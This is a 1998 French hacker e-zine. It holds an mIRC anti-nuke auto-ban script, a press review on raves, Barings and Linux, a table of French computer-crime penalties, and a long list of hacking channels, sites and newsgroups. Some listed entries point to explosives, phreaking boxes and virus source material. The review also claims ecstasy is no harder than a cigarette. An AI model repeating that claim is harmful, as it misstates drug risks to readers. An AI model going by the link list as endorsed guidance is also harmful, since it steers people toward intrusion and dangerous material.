set %protocol $parm4 echo 9 -s [---------------------Connection Detected!!!---------------------] set %found 0 set %ialnum 1 set %ccnum 1 if ($1 == 0) { set %nuker *!*@ $+ $2 msg $me *** Nuke from $+ $2 $+ on port $+ $3 $+ ( $+ $+ $upper($4) $+ ) msg $me *** Not found } else { set %nuker *!*@ $+ $1 msg $me *** Nuke from $+ $1 $+ on port $+ $3 $+ ( $+ $+ $upper($4) $+ ) } if ($ial(%nuker,0) <= 1) { set %userword user } else { set %userword users } echo 9 -s Found $ial(%nuker,0) %userword matching this hostmask. if ($ial(%nuker,0) == 0) { goto end } :loopnicks set %ccnum 1 if ($ial(%nuker,%ialnum).nick == $null) { goto end } set %comchans $comchan($ial(%nuker,%ialnum).nick,0) echo 9 -s " $+ $ial(%nuker,%ialnum).nick $+ " was found in %comchans channels you are in. set %nukernick $ial(%nuker,%ialnum).nick :loopcomchan if ($comchan(%nukernick,%ccnum) == $null) { inc %ialnum 1 goto loopnicks } set %nukechan $comchan(%nukernick,%ccnum) if $me isop %nukechan && %nukernick !isop %nukechan { echo 9 -s - %nukechan - removing scum set %nukeban $address(%nukernick,3) msg $me %nukeban nbb -u900 $address(%nukernick,3) %nukernick Stay off port ( $+ %port $+ ) ( $+ %protocol $+ ) !! (Eternal Thug) set %found 1 } else { echo 9 -s - %nukechan - %nukernick $+ 's an op! set %found 1 } inc %ccnum 1 goto loopcomchan inc %ialnum 1 goto loopnicks :end unset %nukernick unset %ialnum unset %ccnum unset %nuker unset %comchans unset %nukechan unset %userword unset %port unset %protocol if ((%found == 0) && ($1 != 0)) { .timer 1 2 /nuke 0 $2 $3 $4 } unset %found echo 9 -s [---------------------Connect Scan end!----------------------] echo -s - halt } ------------------------------------Finito!--------------------------------- Pour plus de scripts pour mIRC allez sur www.mircx.com! Les channels de hacking sur IRC: Undernet: #hack.fr -Tres bon channel francophone. IRCnet #banane -Pareil. DalNet #Hackers_United -Tres bon channel anglophone pour apprendre le hacking Ecrit par SoD (SoD@hotmail.com) /----------\ /(__)____(__)\ |#h/p/c/l/p-1| / xx/yy/1998 \ \##############/ \&&&&&&&&&&&&/ \__________/ _________ _________ /--------/ Revue de presse /--------/ /-- -- --/ et des evenements. /-- -- --/ /-- -- --/ /-- -- --/ /-- -- --/ par stealthyx /-- -- --/ /-- -- --/ /-- -- --/ /________/ /________/ Voila g decide de faire une revu de presse et des evenements qui m'ont marque. Non, ne vous inquietez po !!! je v pas faire mon autobiographie, elle ne m'interresserait po moi meme... En fait c juste pour quittez un peu le sujet principal du mag... Mais tout en restant près de l'underground. Ce qui serait bien c que vous en faites aussi... Envoyez nous des mails, dites nous ce que vous pensez de la societe et de tout ce qui l'entoure... Mais n'oubliez quand meme po le sujet principal de ce zine... Ne nous envoyez po que des revues de presse... c gentil. Quand je mets "par stealthyx" c tout simplement parceque je le vois ainsi & que je sais que ma vision n'est po celle de tout le monde... Vous connaissez Coda ??? Ben pour ceux qui n'habite po en France et pour les autres c un mag de techno... Qu'est ce qui pourrais bien nous interreser dans ce mag ??? Ceci : le 16 mai 1998 il y a eu un dece lors du tecknival une rave bretonne. Descente des flics => "Matraques en pagaille, sound systeme defonces ("pour se creer une ouverture"!?), femmes trainees par les cheveux, un bus gaze dans lequel se trouvait des enfants !!!". Voila comment c deroule ce tecknival. Les raveurs ont naturellement riposte. Et c'etait leur droit, si l'on prend en compte la maniere dont ont agit les agents de "l'ordre". Mais voila il y a une polemique, du à la mort du jeune raveur lors de cette rave. Leur parent clame le meurtre, alor que l'enquete a conclu au suicide. Une polemique que reprend l'express, magazine de droite republicaine française... Mais cette fois ce magazine traite le sujet avec + de recul : il analyse le phenomene et l'article s'intitule "doit on avoir peur des raves". Pour une fois je salut le magazine, il a su reprendre le probleme à sa juste valeur : les raves font peur. Parceque la techno est un courant nouveau dont peu de gens arrivent à cerner la politique... Et c normal puisque la techno n'a aucune politique!!! C'est un courant (que dis je une CULTURE) pluriculturelle base sur la fete et la joie de vivre... La techno est en effet nee sur les dances floor des discoteques de Detroit, ou des gens venaient s'y changer les idees apres une semaine de travail... "one world, one future" (theme de la love parade 1998) Mais si les raves sont interdites c aussi parceque les raves ont une description de debauche et de drogue : l'ecstasie en particulier... Et on reprend le Coda..."Ainsi un professeur nous relate cette anecdote... Des policiers font la tournee des lycees dans le cadre d'une vaste campagne de prevention contre la drogue.(...) Mais la prevention tourne à la parodie quand en aparte des eleves, et à l'unique destination des professeurs et du proviseur, les policiers declarent : "mefiez vous des eleves quilisent Coda. Ce sont peut etre des dealers, surement des consommateurs."" A noter que l'ecstasie est aussi dur qu'une simple cigarette, et moins que l'alcool... Et voila comment on vois les jeunes qui s'interressent aux courants nouveau. Ils ont peur de c jeunes techno-raveurs... Comme ils ont peur des hackers parceque "ils ont le pouvoir de semer le chaos." Alor les dirigeant de ce beau-pays (les prefets en particulier qui poussent les raves à la clandestinite en leur ineterdisant des representations dans des salles securises) insufflent au bon parents la peur de l'inconnue, interdisent, censurent, mais po ce qui faut, & le fn reste... C triste... Mais bon, on va pas se plaindre, avec la world cup, c'est la fete tous les jours...;)). Surtout quand une equipe black,blanc,beur gagne la coupe, et, du coupd encule le FN... C L'ETE !!! Et c un ete pleins de fetes!!! On retiendra L'AREA à Amiens, La LOVE PARADE à Berlin (ca sent de + en + le ble), BOREALIS à Montpellier, DANCE VALLEY en Hollande à SPAARWOUDE, la LAKE PARADE à Geneve, ENERGY 98 à Zurick suivit de la STREET PARADE. Et les TEKNIVALS interdites. Faut se renseigner pour savoir la date et le lieu des teknivals... La fetes est là, les maillots de bain aussi est Ibiza vous attend les bras ouvert... Le crash de la banque anglaise tres aristocratique BEARINGS fait des remoux dans la presse et la TV. Un reportage entier à ete fait sur Nick Leeson. On apprend ainsi qu'avant de partir à Singapour, il avait laisse un montant de dettes de 400 millions de £ dans un compte qu'il avait fait pour les cacher. Le lendemain ce montant etait de 800 million de £. C beaux la bourse !!!:)) La Bearings a ete finalement vendu à une £ à une societe hollandaise. Chapeau bas pour Nick qui se tape un cancert du côlon dans une cellule de Singapour (d'apres le point) et qui c fait lacher par sa femme... Nous on t'aime NICK!!! Bravo!!!!!!!!!!!!!!!! clap,clap,clap,clap...... Dans les lycees francais ou le ministere de l'education nationnal faisait passer un circulaire. Un etudiant a donc exige "des profs blondes à fortes poitrines, des tops bonnes, pas des tons". ARF! Cote informatique, linux se develope un peu partout en dehors de l'internet. SVM, un magazine français sur l'informatique habituellement centre sur windaube, comme les autres d'ailleurs, fait un dossier complet sur les os alternatif, dont linux. Pc Mag aussi si met, en expliquant la maniere de foutre plusieur os sur sa becane... De son cote Dream continu le combat et nous presente le nouveau noyau de linux le futur 2.2.xx :))), et commence un volet programmation en C. L'underground commence à ce decouvrir et c po + mal... Alor que Microsoft cool (ouaaaa le je de mot :) sous le poid des poursuites judicieres (hihi). Ce qui compromet durement le lancement de windaube 98, & billou commence a prendre c attaques aux serieux : il pourrait voir toutes son entreprise monopolistique (euuuh) divisee...hehehehehehe Retour sur SVM d'il y a plusieur mois. Il nous devoille que meme en effacant il reste toujour des traces des informations sur le HD. Bon ct connu mais, comme sur l'irc y'a un mec qui nous dit qu'il a hacke une becane... Doit po etre au courant celui-la : dites vous dors et deja que les flics peuvent trouver des preuves contre vous si vous avez dit ce genre de conneries (arf). Cote underground on est content par ce que ca revit... Alor que la page de NoRoute tombe sur une erreur (la censure encore une fois), des nouveaux mags francophones apparaissent en plus de celui ci : frhack qui n'est po mal, mais dans lequel on remarque quelque copier-coller (les auteurs ne sitent pas leur source), et oui c dure d'ecrire quelque chose de neuf...:). C quand meme un mag de qualite que vous pouvez trouver sur www.frhack.org. Vous pouvez aussi retrouver l'equipe sur undernet (port 6667) #hack.fr... Aussi un autre mag un peu moins neuf, il en est a son quinzieme numero, mais d'actualite, Total controll. On leur souhaite à tout 2 longue vie... Si vous avez vu d'autre mag nouveau (& pas seulement francophone) n'hesitez po à ecrire a h_p_c_l_psite@yahoo.com. En ce qui concerne les attaques, on estime le nombre d'ordinateur pirate à 10000 en 1997. On apprend aussi que un tribunal a renonce aux poursuites contre un groupe de hacker : "en l'abscence de mise en place d'un systeme de protection (...) l'acces aux ordinateur s'est effectue sans fraude". Autre info : _________________________________________________ Infractions : |Emprisonnement : |Amendes : | ------------------|-----------------|-----------| acces frauduleux | 1ans |100 000 F | à un reseau : | | | ------------------|-----------------|-----------| Atteinte involon- | 2ans |200 000 F | -taire au reseau | | | informatique : | | | ------------------|-----------------|-----------| Atteinte volon- | 3ans |300 000 F | -taire d'un reseau| | | ------------------| | | Manipulation fraud| | | -uleuse de donnees| | | ------------------| | | Vol de materiel | | | informatique : | | | ------------------|-----------------|-----------| Vol aggrave : | 5ans |500 000 F | ------------------|-----------------|-----------| Destruction ou de-| 1 à 2ans |100 000 à | -terioration sans | |200 000 F | danger pour les | | | personnes : | | | ------------------|-----------------|-----------| Destruction ou de-| 2 à 5 ans |2 000 000 à| -terrioration | |5 000 000 F| dangeureuse pour | | | les personnes | | | __________________|_________________|___________| Hackez en paix... SEPTEMBRE 1998 : je v sur hack.fr le chan de frhack le mag.... Et qu'est ce que j'apprend : frhack le groupe n'existe p'us!!!!! vaToo l'un des redacteurs et l'un des createur du site a fait un autre groupe en attendant, (sur le phreak ca specialite): Cryptel... Mais ou est donc Utopiste ??? Esperons que le nouveau groupe de vaToo tienne le coups et que (on ne sait jamais) le groupe frhack recussite ! Amen... Source : Dream, SVM, Coda, l'Express, Le nouvel obs, Trax... steal /----------\ /(__)____(__)\ |#h/p/c/l/p-1| / xx/yy/1998 \ \##############/ \&&&&&&&&&&&&/ \__________/ |--------------------------------------------| |Les bouquins, les #, & les url interressants| | |--------------------------------------------| On vas d'abord commencer par les channels : Les noms des # d'un serveur irc à l'autre ne changent po beaucoups, on peut donc trouver presque à tout les coups : #2600 #hack #hacker #hacking #phreak #phreaker #phreaking #warez #linux #cellular #Unix etc... Mais lorsque vous tapez ca vous avez 90% de chance de tomber sur un channel anglais... Si vous voullez un channel en francais par exemple tapez : #hack.fr #hacking.fr #hacker.fr etc ... ou bien : #francehack etc....... Pour les url à present voici une liste non exostive, vous pouvez toujour nous mailler des urls : En anglais : (ces sites sont tire du faq de 2600) Sites ftp : 204.215.84.2 /pub/dmackey 2600.com (2600 Magazine) aeneas.mit.edu (Kerberos) alex.sp.cs.cmu.edu /links/security (Misc) asylum.sf.ca.us (CyberWarriors of Xanadu) atari.archive.umich.edu /pub/atari/Utilities/pgp261st.zip (Atari PGP) athena-dist.mit.edu /pub/ATHENA (Athena Project) atlantis.utmb.edu (Anti-virus) bellcore.com (Bellcore) cert.org (CERT) ciac.llnl.gov (CIAC) clark.net /pub/jcase (H/P) cnit.nsk.su /pub/security (Security) coast.cs.purdue.edu /pub (Security/COAST) coombs.anu.edu.au /pub/security (Security) csrc.ncsl.nist.gov (NIST Security) dartmouth.edu /pub/security (Security) ds.internic.net (Internet documents) dutiws.twi.tudelft.nl /pub/novell etext.archive.umich.edu /pub/Zines/PrivateLine (PrivateLine) fastlane.net /pub/nomad ftp.3com.com /pub/Orange-Book (Orange Book) ftp.acns.nwu.edu /pub (Mac Anti-virus) ftp.acsu.buffalo.edu /pub/security & /pub/irc (Security & IRC) ftp.alantec.com /pub/tcpr (Tcpr) ftp.armory.com /pub/user/kmartind (H/P) ftp.armory.com /pub/user/swallow (H/P) ftp.auscert.org.au /pub (Australian CERT) ftp.cerf.net /pub/software/unix/security (CERFnet) ftp.cert.dfn.de (FIRST) ftp.cisco.com (Cisco) ftp.commerce.net /pub/standards/drafts/shttp.txt (Secure HyperText) ftp.cs.colorado.edu ftp.cs.ruu.nl /pub/SECURITY (Security & PGP) ftp.cs.uwm.edu /pub/comp-privacy (Privacy Digest) ftp.cs.vu.nl ftp.cs.yale.edu ftp.csi.forth.gr /pub/security ftp.csl.sri.com /pub/nides (SRI) ftp.csn.org /mpj (Cryptology) ftp.csua.berkeley.edu /pub/cypherpunks (Crypto) ftp.delmarva.com ftp.demon.co.uk /pub/misc/0800num.txt (0800/0500 numbers) ftp.denet.dk /pub/security/tools/satan ftp.digex.net /pub/access/dunk ftp.dsi.unimi.it /pub/security/crypt (Crypto) ftp.dstc.edu.au /pub/security/satan ftp.ee.lbl.gov ftp.eff.org /pub/Publications/CuD (EFF) ftp.elelab.nsc.co.jp /pub/security (Security) ftp.etext.org (Etext) ftp.fc.net /pub/deadkat (TNO) ftp.fc.net /pub/defcon (DefCon) ftp.fc.net /pub/defcon/BBEEP (BlueBeep) ftp.fc.net /pub/phrack (Phrack) ftp.foobar.com ftp.funet.fi /pub/doc/CuD ftp.gate.net /pub/users/laura ftp.gate.net /pub/users/wakko ftp.giga.or.at /pub/hacker/ (H/P) ftp.greatcircle.com /pub/firewalls (Firewalls) ftp.IEunet.ie /pub/security (Security) ftp.ifi.uio.no ftp.indirect.com /www/evildawg/public_access/C&N/ ftp.info.fundp.ac.be ftp.informatik.uni-hamburg.de ftp.informatik.uni-kiel.de /pub/sources/security ftp.inoc.dl.nec.com /pub/security (Security) ftp.isi.edu ftp.lava.net /users/oracle/ (H/P ftp.leo.org/pub/com/os/os2/crypt ftp.lerc.nasa.gov /security ftp.llnl.gov /pub (CIAC) ftp.luth.se /pub/unix/security ftp.lysator.liu.se ftp.mcs.anl.gov /pub/security ftp.microserve.net /ppp-pop/strata/mac (Mac) ftp.near.net /security/archives/phrack (Zines) ftp.nec.com ftp.net.ohio-state.edu /pub/security/satan ftp.netcom.com /pub/br/bradleym (Virii) ftp.netcom.com /pub/da/daemon9 (H/P) ftp.netcom.com /pub/fi/filbert ftp.netcom.com /pub/gr/grady ftp.netcom.com /pub/il/illusion (H/P+Virus) ftp.netcom.com /pub/je/jericho (H/P) ftp.netcom.com /pub/le/lewiz (Social Engineering) ftp.netcom.com /pub/ty/tym (TYM) ftp.netcom.com /pub/va/vandal (DnA) ftp.netcom.com /pub/wt/wtech/ ftp.netcom.com /pub/zi/zigweed (H/P) ftp.netcom.com /pub/zz/zzyzx (H/P) ftp.netsys.com ftp.ocs.mq.edu.au /PC/Crypt (Cryptology) ftp.ox.ac.uk /pub/comp/security ftp.ox.ac.uk /pub/crypto (Cryptology) ftp.ox.ac.uk /pub/wordlists (Wordlists) ftp.paranoia.com /pub/toneloc/tl110.zip (ToneLoc) ftp.pipex.net /pub/areacode (uk areacodes) ftp.pop.psu.edu ftp.primenet.com /users/i/insphrk ftp.primenet.com /users/k/kludge (H/P) ftp.primenet.com /users/s/scuzzy (Copy Protection) ftp.primus.com /pub/security (Security) ftp.psy.uq.oz.au ftp.psy.uq.oz.au /pub/DES ftp.rahul.net /pub/conquest/DeadelviS/script/vms/ ftp.rahul.net /pub/lps (Home of the FAQ) ftp.sert.edu.au ftp.sgi.com ftp.smartlink.net /pub/users/mikes/haq ftp.std.com /archives/alt.locksmithing (Locksmithing) ftp.std.com /obi/Mischief/ (MIT Guide to Locks) ftp.std.com /obi/Phracks (Zines) ftp.sunet.se /pub/network/monitoring (Ethernet sniffers) ftp.sura.net /pub/security (SURAnet) ftp.technet.sg ftp.technion.ac.il ftp.tis.com /pub (TIS) ftp.tisl.ukans.edu /pub/security ftp.uni-koeln.de (Wordlists) ftp.uspto.gov ftp.uu.net /doc/literary/obi/Phracks (Zines) ftp.uwp.edu /pub/dos/romulus/cracks (Copy Protection) ftp.vis.colostate.edu ftp.vix.com ftp.vortex.com ftp.warwick.ac.uk /pub/cud (Zines) ftp.wi.leidenuniv.nl /pub/security ftp.win.tue.nl /pub/security (Security) ftp.winternet.com /users/nitehwk (H/P) ftp.wustl.edu /doc/EFF (EFF) ftp.zoom.com ftp.zrz.tu-berlin.de/pub/security/virus/texts/crypto (Cryptology) garbo.uwasa.fi /pc/crypt (Cryptology) gemini.tuc.noao.edu /pub/grandi gti.net /pub/safetynet gumby.dsd.trw.com hack-this.pc.cc.cmu.edu (Down for Summer) heffer.lab.csuchico.edu (Third Stone From The Sun) hplyot.obspm.fr info.mcs.anl.gov infonexus.com /pub (The Guild) jerico.usc.edu l0pht.com (The L0pht) lcs.mit.edu /telecom-archives (Telecom archives) lod.com (Legion of Doom) mac.archive.umich.edu mary.iia.org /pub/users/patriot (Misc) monet.ccs.itd.umich.edu net-dist.mit.edu /pub/pgp net.tamu.edu /pub/security/TAMU (Security) net23.com /pub (Max Headroom) nic.ddn.mil /scc (DDN Security) nic.sura.net /pub/security oak.oakland.edu /pub/hamradio (Ham Radio) oak.oakland.edu /SimTel/msdos/sound (DTMF decoders) oak.oakland.edu /SimTel/msdos/sysutil (BIOS attackers) parcftp.xerox.com prism.nmt.edu /pub/misc (Terrorist Handbook) pyrite.rutgers.edu /pub/security (Security) relay.cs.toronto.edu /doc/telecom-archives (Telecom) rena.dit.co.jp /pub/security (Security) research.att.com /dist/internet_security (AT&T) ripem.msu.edu /pub/crypt (Ripem) rmii.com /pub2/KRaD (KRaD Magazine) rtfm.mit.edu (Etext) rtfm.mit.edu /pub/usenet-by-group (Usenet FAQ's) scss3.cl.msu.edu /pub/crypt (Cryptology) sgigate.sgi.com /Security (SGI Security) sierra.stanford.edu spy.org (CSC) src.doc.ic.ac.uk /usenet/uk.telecom (uk.telecom archives) suburbia.apana.org.au /pub/unix/security (Security) sunsolve1.sun.com theta.iis.u-tokyo.ac.jp /pub1/security (Security) titania.mathematik.uni-ulm.de /pub/security (Security) toxicwaste.mit.edu /pub/rsa129/README (Breaking RSA) ugle.unit.no unipc20.unimed.sintef.no vic.cc.purdue.edu vixen.cso.uiuc.edu /security web.mit.edu whacked.l0pht.com (Mac + H/P) wimsey.bc.ca /pub/crypto (Cryptology) wuarchive.wustl.edu /pub/aminet/util/crypt Les newsgroups : alt.2600 Do it 'til it hertz alt.2600hz alt.2600.codez alt.2600.debate alt.2600.moderated alt.cellular alt.cellular-phone-tech Brilliant telephony mind blow netnews naming alt.comp.virus An unmoderated forum for discussing viruses alt.comp.virus.source.code alt.cracks Heavy toolbelt wearers of the world, unite alt.cyberpunk High-tech low-life. alt.cyberspace Cyberspace and how it should work. alt.dcom.telecom Discussion of telecommunications technology alt.engr.explosives [no description available] alt.fan.kevin-mitnick alt.fan.lewiz Lewis De Payne fan club alt.hackers Descriptions of projects currently under development alt.hackintosh alt.locksmithing You locked your keys in *where*? alt.hackers.malicious The really bad guys - don't take candy from them alt.ph.uk United Kingdom version of alt.2600 alt.privacy.anon-server Tech. & policy matters of anonymous contact servers alt.radio.pirate Hide the gear, here comes the magic station-wagons. alt.radio.scanner Discussion of scanning radio receivers. alt.satellite.tv.europe All about European satellite tv alt.security Security issues on computer systems alt.security.index Pointers to good stuff in misc.security (Moderated) alt.security.keydist Exchange of keys for public key encryption systems alt.security.pgp The Pretty Good Privacy package alt.security.ripem A secure email system illegal to export from the US comp.dcom.cellular [no description available] comp.dcom.telecom Telecommunications digest (Moderated) comp.dcom.telecom.tech [no description available] comp.org.cpsr.announce Computer Professionals for Social Responsibility comp.org.cpsr.talk Issues of computing and social responsibility comp.org.eff.news News from the Electronic Frontiers Foundation comp.org.eff.talk Discussion of EFF goals, strategies, etc. comp.os.netware.security Netware Security issues comp.protocols.kerberos The Kerberos authentification server comp.protocols.tcp-ip TCP and IP network protocols comp.risks Risks to the public from computers & users comp.security.announce Announcements from the CERT about security comp.security.firewalls Anything pertaining to network firewall security comp.security.misc Security issues of computers and networks comp.security.unix Discussion of Unix security comp.virus Computer viruses & security (Moderated) de.org.ccc Mitteilungen des CCC e.V. misc.security Security in general, not just computers (Moderated) rec.pyrotechnics Fireworks, rocketry, safety, & other topics rec.radio.scanner [no description available] rec.video.cable-tv Technical and regulatory issues of cable television sci.crypt Different methods of data en/decryption Les sites telnet : anarchy-online.com ntiabbs.ntia.doc.gov (NTIA) l0pht.com (The L0pht) sfpg.gcomm.com (The Floating Pancreas) telnet lust.isca.uiowa.edu 2600 (underground bbs) (temporarily down) pcspm2.dar.csiro.au (Virtual Doughnutland BBS) prince.carleton.ca 31337 (Twilight of The Idols) spy.org (Computer Systems Consulting) Les sites gopher : ba.com (Bell Atlantic) cell-relay.indiana.edu (Cell Relay Retreat) csrc.ncsl.nist.gov (NIST Security Gopher) gopher.acm.org (SIGSAC (Security, Audit & Control)) gopher.cpsr.org (Computer Professionals for Social Responsibility) gopher.eff.org (Electonic Frontier Foundation) gopher.panix.com (Panix) gw.PacBell.com (Pacific Bell) iitf.doc.gov (NITA -- IITF) info.itu.ch (International Telegraph Union) ncjrs.aspensys.com (National Criminal Justice Reference Service) oss.net (Open Source Solutions) spy.org (Computer Systems Consulting) wiretap.spies.com (Wiretap) Les sites World wide Web : 134.220.198.66:8000 (Peter Strangman's) alcuin.plymouth.edu/~jay/underground.html (Underground Links) all.net (American Society for Industrial Security Management) alumni.caltech.edu/~dank/isdn/ (ISDN) asearch.mccmedia.com/www-security.html (WWW-security info) aset.rsoc.rockwell.com (NASA/MOD AIS Security) aset.rsoc.rockwell.com/exhibit.html (Tech. for Info Sec) att.net/dir800 (800 directory) ausg.dartmouth.edu/security.html (UNIX Security Topics) bianca.com/bump/ua (Unauthorized Access Home Page) ccnga.uwaterloo.ca/~jscouria/gsm.html (GSM Specification) cell-relay.indiana.edu/cell-relay (Cell Relay Retreat) ciac.llnl.gov (CIAC Web Site) community.net/community/all/home/solano/sbaldwin cs.purdue.edu/homes/spaf/coast.html (The COAST Project and Laboratory) csbh.mhv.net/dcypher/home.html (Dcypher's Home Page) csrc.ncsl.nist.gov (NIST) cwix.com/cwplc (Cable and Wireless) daemon.apana.org.au/~longi/ dcpu1.cs.york.ac.uk:6666/fisher/telecom (Embryonic Telephone History Page) dfw.net/~aleph1 (The Uebercracker's Security Web) draco.centerline.com:8080/~franl/crypto.html (Crypto) draco.centerline.com:8080/~franl/privacy/bacard-review.html enigma.pc.cc.cmu.edu/~caffeine/home.html (Caffeine's Home Page) everest.cs.ucdavis.edu/Security.html (UCDavis.edu Security Page) everest.cs.ucdavis.edu/slides/slides.html (Security Lab Slides) ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html (CSSCR) fastlane.net/homepages/thegnome (Simple Nomad) first.org (FIRST) freeside.com/phrack.html (Phrack Magazine) frosted.mhv.net/keytrap.html ftp.arpa.mil (ARPA home page) ftp.tamu.edu/~abr8030/security.html (Security) grove.ufl.edu/~bytor (Bytor home page) hightop.nrl.navy.mil/potpourri.html (MOD Security) hightop.nrl.navy.mil/rainbow.html (MOD Rainbow Books) ice-www.larc.nasa.gov/ICE/papers/hacker-crackdown.html (Sterling) ice-www.larc.nasa.gov/ICE/papers/nis-requirements.html (ICE NIS) info.bellcore.com/BETSI/betsi.html (Betsi) info.gte.com (GTE Labrotories) info.mcc.ac.uk/Orange (Orange) infosec.nosc.mil/infosec.html (SPAWAR INFOSEC) infosec.nosc.mil/navcirt.html (NAVCIRT) iss.net/iss (Internet Security Systems) jumper.mcc.ac.uk/~afs/telecom (UK Telecom Pricing Information) l0pht.com (The l0pht) l0pht.com/~oblivion/IIRG.html (Phantasy Magazine) l0pht.com/~spacerog/index.html (Whacked Mac Archives) lcs.mit.edu/telecom-archives/areacodes/guide (North American Area Codes) lcs.mit.edu/telecom-archives/npa.800 (1-800 Info) lcs.mit.edu/telecom-archives/npa.900 (1-900 Info) lod.com (Legion of Doom) lod.com/~gatsby (Gatsby) lod.com/~tabas (Mark Tabas -- LOD) lod.com/~vampire/emptime7 (Empire Times) magicnet.net/xtabi/netscape/links/cypher.html (Cryptology) mars.superlink.net/user/esquire (Red box info) matrix.resnet.upenn.edu/rourke (FakeMail FAQ) mindlink.jolt.com (The Secrets of LockPicking) mindlink.net/A7657 (Stephen H Kawamoto's Home Page) mls.saic.com (SAIC MLS) mnementh.cs.adfa.oz.au/Lawrie_Brown.html (Lawrie Brown's crypto bibliography) motserv.indirect.com (Motorola) naic.nasa.gov/fbi (FBI information) nasirc.nasa.gov/NASIRC_home.html (NASIRC) obscura.com/~loki/ (Cryptology) ophie.hughes.american.edu/~ophie (Ophie) oregano.sl.pitt.edu/index.htm outpost.callnet.com/outpost.html pages.ripco.com:8080/~glr/glr.html (Full Disclosure) peg.pegasus.oz.au (EFF Australia) quetel.qc.ca/qt0000ag.htm (Quebec-Telephone) resudox.net/bio/mainpage.html (BioHazard's Home Page) ripco.com:8080/~glr/glr.html (Full Disclosure) rschp2.anu.edu.au:8080/crypt.html scitsc.wlv.ac.uk/~cs6171/hack (UNIX Security) seclab.cs.ucdavis.edu/Security.html (Security) seclab.cs.ucdavis.edu/slides/slides.html (Security Lab Slides) sfpg.gcomm.com/mitnick/mitnick.htm (3wP Kevin Mitnick WWW HomePage) smurfland.cit.buffalo.edu/NetMan/index.html (Network Management) sunsite.unc.edu/sun/inform/sun-info.html (Sun Microsystems Sponsor Page) support.mayfield.hp.com (Hewlett Packard SupportLine Services) tamsun.tamu.edu/~clm3840/hacking.html (Hacking/Phreaking) the-tech.mit.edu (LaMacchia case info) town.hall.org/university/security/stoll/cliff.html (Cliff Stoll) turnpike.net/emporium/C/celestial/celest.html (Detective Databases 1995) ucs.orst.edu:8001/mintro.html (Micro Power Broadcasting) underground.org (Eubercrackers) unixg.ubc.ca:780/~jyee/ (Cell) w3.gti.net/safety web.mit.edu/network/pgp.html (Getting PGP) web.nec.com/products/necam/mrd/cellphones/index.html(NEC) weber.u.washington.edu/~phantom/cpunk/index.html (Cryptology) wildsau.idv.uni-linz.ac.at/~klon/underground/underground.html (Klon's Underground Links) wintermute.itd.nrl.navy.mil/5544.html (Network Security) www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html www-ns.rutgers.edu/www-security/index.html (Rutger's documents on WWW security) www-personal.engin.umich.edu/~jgotts/underground/boxes.html (Box info) www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html(This document) www-swiss.ai.mit.edu/~bal/pks-toplev.html (Findingsomeone's PGP key) www.2600.com (2600 Magazine) www.8lgm.org (8lgm Security Advisories) www.aads.net (Ameritech) www.access.gpo.gov/su_docs/ www.aloha.com/~seanw/index.html www.alw.nih.gov/WWW/security.html (Unix Security) www.artcom.de/CCC/hotlist.html (Chaos Computer Club Hotlist) www.artech-house.com/artech.html (Artech House) www.asg.unb.ca (Atlantic Systems Group Mosaic Index) www.aspentec.com/~frzmtdb/fun/hacker.html www.aston.ac.uk/~bromejt/mobile.html (Mobile Phone Service Locator) www.att.com (ATT) www.auditel.com (Auditel) www.auscert.org.au (Australian CERT) www.axent.com/axent (Axent Technologies) www.ba.com (Bell Atlantic) www.bctel.com (BC Tel) www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html(X-Win) www.bell.ca (Bell Canada) www.bell.com (MFJ Task Force) www.bellcore.com/SECURITY/security.html (Bellcore Security Products) www.border.com (Border Network Technologies) www.brad.ac.uk/~nasmith/index.html www.brad.ac.uk/~nasmith/underground.html (Undergound WWW Sites) www.bst.bls.com (BellSouth) www.bt.co.uk (British Telecom) www.business.co.uk/cellnet (Cellnet) www.c2.org:80/remail/by-www.html (WWW-based remailing form) www.c3.lanl.gov/~mcn (Lanl) www.cam.org/~gagnon (OCP's) www.careermosaic.com/cm/uswest (USWest) www.castle.net/~kobrien/telecom.html (Telecom) www.cco.caltech.edu/~rknop/amiga_pgp26.html www.cdt.org/cda.html www.cec.wustl.edu/~dmm2/egs/egs.html (En Garde Systems) www.cert.dfn.de/ (German First Team) www.checkpoint.com (Checkpoint) www.chem.surrey.ac.uk/~ch11mh/secure.html (Another page on secure WWW server setup) www.cis.ksu.edu/~psiber/fortress/phreak/ph2reak.html (Are You Some Kind Of PHREAK!) www.cis.ohio-state.edu/hypertext/faq/usenet/alt-2600-faq/faq.html www.cityscape.co.uk/users/ek80/index.html (Inside Cable Cover) www.cohesive.com (Cohesive Systems) www.commerce.net/information/standards/drafts/shttp.txt (HyperText) www.con.wesleyan.edu/~triemer/network/docservs.html www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html www.cosc.georgetown.edu/~denning/crypto (The Cryptography Project) www.cost.se (COST Computer Security Technologies) www.cpsr.org/home (CPSR) www.crimson.com/isdn/telecomacry.txt (Crimson's Telecommunications Acronyms) www.crtc.gc.ca (CRTC - Canadian regulator) www.cs.berkeley.edu/~raph/remailer-list.html (Anon remailer list) www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html (CMU Security) www.cs.purdue.edu/coast/coast.html (Coast) www.cs.purdue.edu/pcert/pcert.html (PCERT) www.cs.tu-bs.de (Network management Tools) www.cs.tufts.edu/~mcable/cypher/alerts/alerts.html (Cypherpunk) www.cs.umd.edu/~lgas (Laughing Gas) www.cs.umd.edu/~lgas/haquerwerld/haquer-individuals.html(Haquerwerld) www.csd.harris.com/secure_info.html (Harris) www.csl.sri.com (SRI Computer Science Lab) www.csua.berekeley.edu/pub/cypherpunks/Home.html (Cryptology) www.cwi.nl/cwi/people/Jack.Jansen/spunk/cookbook.html www.cyber.co.uk/~joyrex (Joyrex Cellular) www.cybercafe.org/cybercafe/pubtel/pubdir.html (CyberCafe) www.cygnus.com/~gnu/export.html (Cryptography Export Control Archives) www.datafellows.fi (Data Fellows (F-Prot) www.datasync.com/~sotmesc/sotmesc.html (SotMESC) www.dcs.exeter.ac.uk/~aba (Cypherpunk) www.dct.ac.uk/~misb3cp/2600/faq.txt www.demon.co.uk/mobiles (C.C.Mobiles) www.dhp.com (DataHaven Project) www.dhp.com/~pluvius (Pluvius' Home Page) www.digicash.com/ecash/ecash-home.html (Ecash Home Page) www.digital.com/info/key-secure-index.html (Digital Secure Systems) www.dnai.com/~gui/index.html www.dtic.dla.mil/defenselink (Office of the U.S. Secretary of Defense (OSD) www.dtic.dla.mil/iac (DoD Information Analysis Center (IAC) Hub Page) 